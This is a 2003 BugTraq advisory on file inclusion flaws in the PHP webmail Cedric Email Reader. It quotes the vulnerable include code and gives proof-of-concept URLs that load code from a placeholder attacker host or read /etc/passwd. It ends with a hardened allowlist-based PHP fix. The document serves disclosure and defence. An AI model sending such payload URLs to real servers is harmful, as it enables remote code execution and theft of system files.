BugTraq
Cedric Email Reader (PHP) Feb 09 2003 10:05AM
MGhz (magas mail lt)


Version : 0.2;0.3;0.4

Website : http://www.isoca.com/

Problems : File inclusion (local, remote)

Version: 0.2;0.3

File:

---------------------------------

email.php3 (version 0.2) ; email.php (version 0.3)

---------------------------------

PHP Code:

---------------------------------

[...]
require('emailreader.ini');
if ($login > "") {
    parse_str($param);
    include($cer_skin);
    include('email.inc');
    $mbox = openimap($server, $username, $password);
    $text = htmlspecialchars(get_part($mbox, $msgid, "TEXT/PLAIN"));
[...]

---------------------------------

Exploit :

---------------------------------

http://[target]/email.php?login=attacker&cer_skin=http://[attacker]/code.php

-->

include http://[attacker]/code.php on remote server

---

include local file

-->

http://[target]/email.php?login=attacker&cer_skin=/etc/passwd

---------------------------------

Versions: 0.4

File:

---------------------------------

webmail/lib/emailreader_execute_on_each_page.inc.php

---------------------------------

PHP Code:

---------------------------------

[...]
$param = imap_base64($login);
parse_str($param);
@include($emailreader_ini);
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[...]

---------------------------------

Exploit :

---------------------------------

http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php

-->

include http://[attacker]/code.php on remote server

---

include local file

-->

http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=/etc/passwd

---------------------------------

--

(if register_globals=On)

--

--

magas (at) mail (dot) lt
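
A hardened form of the 0.4 include logic, as an added example that is not Cedric Email Reader code: the decoded login string is parsed into a local array instead of global scope, and every value that reaches include must match an allowlist. The function name, the allowlist values and the fixed ini path are assumptions, and base64_decode stands in for imap_base64.

```php
<?php
// Added example, not the project's code. Allowlist values, the function
// name and the ini file name are assumptions made for illustration.

const ALLOWED_SERVER_TYPES = ['imap', 'pop3'];   // assumed backend names
const ALLOWED_LANGS        = ['en', 'fr'];       // assumed skin languages

/**
 * Decode the login parameter and return the files to include, or null
 * when any value falls outside the allowlists.
 */
function resolve_includes(string $login): ?array
{
    $decoded = base64_decode($login, true);      // strict mode rejects non-base64 input
    if ($decoded === false) {
        return null;
    }

    // Parse into a local array so request data cannot overwrite
    // variables such as $emailreader_ini or $cer_skin.
    $fields = [];
    parse_str($decoded, $fields);

    $serverType = $fields['server_type'] ?? '';
    $lang       = $fields['lang'] ?? '';

    // Strict comparison: arrays, paths and URLs never match an allowlist entry.
    if (!in_array($serverType, ALLOWED_SERVER_TYPES, true)
        || !in_array($lang, ALLOWED_LANGS, true)) {
        return null;
    }

    return [
        __DIR__ . '/emailreader.ini.php',        // fixed path, never taken from the request
        __DIR__ . '/lib/' . $serverType . '.inc.php',
        __DIR__ . '/skin/emailreaderskin_' . $lang . '.php',
    ];
}

// Constructed sample inputs: one valid, one with a path in "lang".
$ok  = resolve_includes(base64_encode('server_type=imap&lang=en'));
$bad = resolve_includes(base64_encode('server_type=imap&lang=../../x'));
var_dump($ok !== null, $bad === null);
```

Because nothing from the request is used as a variable name or a path fragment without an exact match, the check holds whether or not register_globals is enabled.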
